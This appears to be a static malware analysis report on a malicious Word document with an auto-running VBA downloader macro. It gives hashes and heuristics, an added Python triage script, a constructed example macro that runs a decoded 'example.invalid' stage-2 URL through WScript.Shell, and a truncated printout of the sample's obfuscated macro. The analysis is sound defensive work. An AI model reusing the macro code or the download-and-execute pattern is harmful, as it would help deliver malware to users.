Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d6b3e2bceb12ecbc…

MALICIOUS

Office (OLE)

Size: 226.0 KB
Created: 2018-03-29 21:05:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 0cacc2309786dc78ac0b8a3333193bab
SHA-1: 92b33cbb4e9a7669272f4491da882828bd40a938
SHA-256: d6b3e2bceb12ecbcc7d10dffa6cb6b943ad578afec4beeb47b7603e98fd1bb6b
Risk score: 224

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1105 Ingress Tool Transfer

The file is a malicious Word (OLE) document carrying a VBA macro. The macro runs automatically through AutoOpen and calls CreateObject; together with the ClamAV detection 'Doc.Malware.Emodldr-10025032-0' this points to a downloader that fetches and executes a second-stage payload. The macro's string literals are heavily obfuscated (see the extracted macros.bas below), so no download URL is visible in the static source. An auto-executing macro inside a Word document is consistent with delivery as a spearphishing attachment.

Heuristics (8)

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample a VBA project was in fact recovered (macros.bas under Extracted artifacts), so this marker adds nothing beyond the OLE_VBA_AUTOOPEN finding above.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    This is the standard DrawingML XML namespace URI that Office writes into documents; it is not a host the macro contacts and should not be treated as an indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 35674 bytes
SHA-256: 406c7a5f1f5da64131571b2d1cdb9326b288975b6d9920f71a3a1059b50e37bd
Detection
ClamAV: No threats found (the Doc.Malware.Emodldr signature above fires on the OLE container, not on the decoded VBA source)
Obfuscation or payload: likely
Carved artifact contains 23 long base64-like blob(s).
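The OLE_VBA_AUTOOPEN, OLE_VBA_CREATEOBJ and base64-blob findings above can be reproduced over decoded VBA source with a handful of regular expressions. The following Python is an added example written for this page; it is neither the analysis platform's code nor the sample's macros.bas. It scans a constructed macro (SAMPLE_VBA) for auto-execution entry points, object-creation/shell/download tokens and long base64-alphabet runs inside string literals, then tries to decode each run at all four base64 alignments, because junk prefixes like the ones wrapping this sample's literals shift the framing. The Decode() name inside the constructed macro is hypothetical; the sample's own decoder, zCIGn, is truncated from the preview and is not reproduced here.

```python
"""Static VBA triage in the spirit of the report's OLE_VBA_* heuristics.

Added example for this page; not the report's tooling and not the sample's
macros.bas. SAMPLE_VBA below is constructed, and the Decode() helper it
calls is hypothetical (the sample's zCIGn decoder is not reproduced).
"""
import base64
import binascii
import re

# Entry points that run as soon as the document is opened/closed with macros enabled.
AUTOEXEC_RE = re.compile(
    r"\b(?:AutoOpen|AutoExec|AutoClose|Auto_Open|Document_Open|Document_Close|Workbook_Open)\b",
    re.IGNORECASE,
)
# Object-creation, shell and download tokens (the report's "execution tokens").
EXEC_RE = re.compile(
    r"\b(?:CreateObject|GetObject|WScript\.Shell|Shell|URLDownloadToFile|XMLHTTP|ADODB\.Stream|PowerShell)\b",
    re.IGNORECASE,
)
STRING_LITERAL_RE = re.compile(r'"([^"\r\n]*)"')
# A long run of base64-alphabet characters; junk such as '%' or '@' around it is tolerated.
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def find_autoexec(src):
    return sorted({m.group(0) for m in AUTOEXEC_RE.finditer(src)})


def find_exec_tokens(src):
    return sorted({m.group(0) for m in EXEC_RE.finditer(src)})


def find_blobs(src):
    """Base64-like runs inside string literals: the report's 'long base64-like blob' count."""
    blobs = []
    for lit in STRING_LITERAL_RE.finditer(src):
        blobs.extend(B64_RUN_RE.findall(lit.group(1)))
    return blobs


def _as_text(raw):
    # UTF-16LE text: every odd byte is zero, every even byte is printable ASCII.
    if (len(raw) >= 4 and len(raw) % 2 == 0
            and all(b == 0 for b in raw[1::2])
            and all(32 <= b < 127 for b in raw[0::2])):
        return raw.decode("utf-16-le")
    if raw and all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
        return raw.decode("ascii")
    return None


def decode_candidates(blob):
    """Try all four base64 alignments, since a junk prefix shifts the framing."""
    out = []
    for offset in range(4):
        cand = blob[offset:]
        cand = cand[: len(cand) - len(cand) % 4]  # drop a ragged tail
        if not cand:
            continue
        try:
            raw = base64.b64decode(cand, validate=True)
        except (binascii.Error, ValueError):
            continue
        text = _as_text(raw)
        if text is not None:
            out.append((offset, text))
    return out


def triage(src):
    autoexec = find_autoexec(src)
    exec_tokens = find_exec_tokens(src)
    blobs = find_blobs(src)
    findings = []
    if autoexec:
        findings.append("OLE_VBA_AUTOOPEN")
    if any(t.lower() == "createobject" for t in exec_tokens):
        findings.append("OLE_VBA_CREATEOBJ")
    return {
        "autoexec": autoexec,
        "exec_tokens": exec_tokens,
        "blob_count": len(blobs),
        "obfuscation_likely": bool(blobs),
        "decoded": [c for b in blobs for c in decode_candidates(b)],
        "findings": findings,
    }


# Constructed macro (not from the sample): a junk-wrapped, base64-encoded UTF-16LE
# string is handed to a hypothetical Decode() and then executed via WScript.Shell.
_STAGE2 = "http://example.invalid/stage2.exe"
_BLOB = base64.b64encode(_STAGE2.encode("utf-16-le")).decode()
SAMPLE_VBA = f'''
Attribute VB_Name = "Module1"
Sub AutoOpen()
    On Error Resume Next
    CafHrd = 63031 / Round(MLWUI) + aAlwGi
    p = Decode("xq%{_BLOB}@Z", 4, {len(_BLOB)})
    Set o = CreateObject("WScript.Shell")
    o.Run p, 0
End Sub
'''

if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

Run it directly to print the triage result; for a real extraction, read the decoded source file into triage() in place of SAMPLE_VBA. When every blob yields nothing at all four alignments, that is itself a finding: the decoder does more than strip junk and base64-decode, and the macro's decoder routine has to be read or emulated rather than guessed.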
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "cdlvpCN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "aRDNTsEBcf"
Function ZvWbXfDrHJcr()
On Error Resume Next
CafHrd = 63031 / Round(MLWUI) + aAlwGi - CStr(99927) * KBPSbJ * AwhPC * iUHcNf * bknwR
IVlsJb = IPirYB
PViuJWLT = zCIGn("uj1EAGIANgBiAGEAZgBhAGIAOABmADkANwAyAGIAOQAwADYANwA2AGIANwAzADEANAA5ADIAYQA5ADcAMAA3AGEAYgBlADcANABkAD%Pj2z", 5, 98)
wLOoE = 10761 / Round(sjdTsz) + RZORBA - CStr(2232) * OEYoYj * pQEMH * PVwtL * PpIYQb
qpPZXA = BwKPQ
AqZpzW = 513 / Round(cfbYi) + siYaO - CStr(54595) * FtUFXK * pdJjaU * Gqhiw * DGMFW
MCYnvJ = kvzFk
suhjmtRjEUd = zCIGn("UwGEAYwA0AGEAMQA0ADgAZgBhADcAMABiADMAZAA3AGQANQBhAGYANwAwADAAYQA0AGQANQA5ADI@Att", 3, 74)
LKZzWr = 97127 / Round(Amrrs) + VowjO - CStr(65786) * wmQpOa * kVIlw * nvdHq * YNLPh
DtfvwQ = ChNYJJ
rtRoE = 39691 / Round(DBZzW) + hlOUuZ - CStr(1806) * CFNDt * RoiBS * RZCSq * lSHwlD
wLXnpD = jspoDk
jCjzlnjYEM = zCIGn("z0aEANwAxADAAMQAxADUAOAAzADYAMwAxADEAOQBhADgAYQA4ADQAZQAyAGUAMQBkADAAMwBmAGIAMwBiADAAMAAzADYAOAA0AGEAOQA0ADAAZAA4ADMAMABjAGQAMABlADYAYQA4AGEAMQAwPRQ", 4, 142)
JBPTY = 62765 / Round(dIiwi) + nhIDT - CStr(18450) * zwuAs * lhYkOO * ZbRsi * WZSDo
LsuBjl = uMNKG
PRkzvw = 14305 / Round(WnfMjc) + JXJTW - CStr(16102) * EuvGko * fpwwPT * QGwXzw * muCzus
PNwppQ = pEpLS
bIhqiwDrLBA = zCIGn("azZPzcMBmADEAYwA1AGYAYQAyADMAMwBhADAAMQA2ADAANwAxADIAYwBhADIAZQA4ADMAZQBkADEAMwAyADkANQBhADQAZgBiADkANQAwAGQAYQA2ADMAN@Y", 8, 111)
qwiPQ = 17470 / Round(tRLvY) + GRAsG - CStr(80590) * lPczGZ * jaBJL * lBoLmi * nCwCCQ
JvpLiW = cbWlI
SmqVjl = 31522 / Round(uQRWj) + vVmCJ - CStr(48872) * msZHm * iuXtaW * zJVKw * KXqwNo
SkCDzZ = DjuQO
QcPuWjfwHUE = zCIGn("jqjclAGYAYgAyAGIANgA3ADYAMgAyADIANwBkAGEAYQA3ADIAZABhAGYAZABjAGYANwA5AGIANwA3ADEAZAA2APFaR", 6, 81)
JldXXq = 99252 / Round(KlAbE) + OAwtL - CStr(37087) * JurUw * WLTPE * BiYtTb * oKHwC
tDlDkB = uoArl
TjvLmp = 23374 / Round(dhlUfm) + FctTA - CStr(13193) * ISBzn * vSNzzM * MOMCBo * fQsViV
GpKwuf = adKoC
QoARXKWUQz = zCIGn("REtAMwBiADEANQA5ADYANwA4AGEAYQBkAGYAOQA1ADUAYwAyAGEAYQA2ADQAMQA3ADgAMgBmAGQAMwAzADEAOQA4ADYAMQBmADMAZAGwzz", 4, 99)
fKUnX = 36280 / Round(ArPrR) + Ynsaf - CStr(29787) * LodCw * hbmlB * zaCUw * zPLlP
ThiGM = DfZlDr
EVdBO = 85753 / Round(DYrUUz) + OhtqL - CStr(93438) * dTHPlU * IhWPT * sDCbEk * TbSAoY
aYVVT = KaCWl
HbwJu = zCIGn("Ii5ADAANwA.jS", 4, 7)
YtuqUF = 1915 / Round(hKfRl) + IaCAGb - CStr(26193) * ZkMAv * TRBfqc * vYkzv * CjPsDk
NkYBQK = UTKiU
DzhpYk = 2166 / Round(AJKJpR) + kadSjv - CStr(92992) * ffGPt * ajRtBH * nOjhS * JblmiU
bwvldD = rBKSV
LKEfNMkupT = zCIGn("tPbwwBmAGIANgAyADQAZQA3ADQAZABhADUAZgAxADcAOQAyAGIANQA3AGYANABiAGMAZQAwAGEANwA2ADIAZAAzAGUAr5", 5, 87)
sadsQ = 75997 / Round(bwLuk) + Lmfus - CStr(45326) * zSbkfP * AbmDRM * rjwtW * KRimAB
sTLGR = aIazsM
QSJMBo = 62049 / Round(lZqEw) + iYwzUV - CStr(47215) * qHRrJX * DluuGJ * BvjMD * zEjBp
XvdUh = KicCv
jznLINwMc = zCIGn("nLiREIAQgBSAGcARwBJADYAdABMAFIAVQBPAG8AcABKAGcAPQA9AHwAMAA1AGMAOQAzADYAOAAzADgAYwBhADMAZQA1ADQAYQBiADcAZAA5ADYA3t2", 5, 107)
iJTho = 92589 / Round(qSKXC) + HRMil - CStr(51165) * CkzBa * Mtvbq * AXiusR * kswHM
aCZkw = rbjGu
GbovzN = 86980 / Round(bGmvSq) + lKOWNl - CStr(3800) * EUGzYw * dObkdv * NDDdKh * JLfas
XPOYI = rjbtO
tNphNwD = zCIGn("Zlzz8AwADUAYQAxADYAOQBkAGUAYQA0ADYAYwAwADQAYQA3ADEAMAAyADcAZQA0AGUAMgA3AGUAYQAzADcAZgA1ADQANgAzADcAYQA0AGIANQBhAGYAMgAwADcAMzaa", 6, 119)
fldXU = 64239 / Round(jozLT) + bUhuIa - CStr(48406) * jSNzDc * ENmKp * iwZmr * NMaaEv
hjKoSS = ovSPXQ
bFmAK = 58835 / Round(sSDXBw) + EuYja - CStr(7098) * YvoJXP * lKFql * wzjBzT * KYFFDQ
sASALf = DKzrm
RHEutYb = zCIGn("3NNLOQAZAAyADcANABjAGQAOABhADAAYgA3ADkAZQBiAGEANAA5ADIAYwBmADUANAA4ADcAZgAxADAANwAzADgAOAA1AGMAYwA3ADUANwA3ADUANABlAGEAYQAwADAAMQA0ADkANQAyADQAMAAyp%", 6, 142)
mHHzh = 30980 / Round(DENXk) + OmApj - CStr(10552) * VNksF * FNvpjJ * ECCQI * nuqnm
QEQbCV 
... (truncated)